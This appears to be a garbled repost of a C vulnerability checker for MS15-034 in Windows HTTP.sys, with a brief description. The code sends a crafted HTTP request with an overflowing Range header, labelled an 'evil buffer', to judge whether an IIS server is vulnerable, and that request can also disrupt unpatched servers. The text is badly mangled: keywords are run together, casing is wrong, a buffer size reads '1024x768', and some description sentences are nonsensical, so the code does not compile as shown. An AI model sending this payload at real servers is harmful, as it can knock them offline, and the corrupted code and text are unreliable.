Vulnerability Information:
A remote code execution vulnerability exists in the HTTP protocol stack (SYS), which causes the vulnerability when HTTP. This makes it easy to change the test tool to a Windows version.
Code:
/*untested-ms15-034 Checker The bug:8a8b2112-push ESI 8a8b2113 6a00 push 0 8a8b2115 2BC7 Sub Eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca SBB ecx, edx 8a8b211b push ecx 8a8b211c push eax 8a8b211d E8BF69FBFF call HT Tp! Rtlulonglongadd (8A868AE1); here*/#defineWin32_lean_and_mean#include<windows.h>#include<stdio.h>#include<string.h>#include<stdlib.h>#include<winsock2.h>#include<Ws2tcpip.h>#pragmaComment (lib, "Ws2_32.lib")intConnect_to_server (Char*ip,Const intPort) { intSOCKFD =0, n =0; //SOCKET socksrv; structsockaddr_in serv_addr;//Initialize versionWORD Version (0); Wsadata Wsadata; intSocket_return (0); Version= Makeword (2,0); Socket_return= WSAStartup (version,&wsadata); if(Socket_return! =0) { return 0; } if(SOCKFD = socket (af_inet, Sock_stream,0)) <0) {printf ("\ error:could Not create socket%d\n", GetLastError ()); return 1; } memset (&SERV_ADDR,'0',sizeof(SERV_ADDR)); Serv_addr.sin_family=af_inet; //serv_addr.sin_port = htons (n);Serv_addr.sin_port =htons (port); if(Inet_pton (Af_inet, IP, &serv_addr.sin_addr) <=0) {printf ("\ Inet_pton Error occured\n"); return 1; } if(Connect (SOCKFD,structSOCKADDR *) &serv_addr,sizeof(SERV_ADDR)) <0) {printf ("\ error:connect Failed \ n"); Exit (-1); return 1; } returnSOCKFD;} intMainintargcChar*argv[]) { intn =0; intSOCKFD; Charrecvbuff[1024x768]; //Check Server CharRequest[] ="get/http/1.0\r\n\r\n"; //Our Evil buffer CharRequest1[] ="get/http/1.1\r\nhost:stuff\r\nrange:bytes=0-18446744073709551615\r\n\r\n"; if(ARGC! =3) {printf ("\ n Usage:%s <ip of server> <port of server> \ n", argv[0]); return 1; } printf ("[*] Audit started\n"); SOCKFD= Connect_to_server (argv[1],atoi (argv[2])); Send (SOCKFD, request, strlen (request),0); Recv (SOCKFD, Recvbuff,sizeof(Recvbuff)-1,0); if(!strstr (Recvbuff,"Microsoft") {printf ("[*] not iis\n"); Exit (1); } SOCKFD= Connect_to_server (argv[1],atoi (argv[2])); Send (SOCKFD, Request1, strlen (request1),0); Recv (SOCKFD, Recvbuff,sizeof(Recvbuff)-1,0); if(Strstr (Recvbuff,"requested Range not satisfiable") {printf ("[!!] Looks vuln\n"); Exit (1); } Else if(Strstr (Recvbuff,"The request has a invalid header name") {printf ("[*] Looks patched"); } Else{printf ("[*] unexpected response, cannot discern patch status"); } return 0;}
Test:
HTTP. sys Remote EXECUTE Code validation tool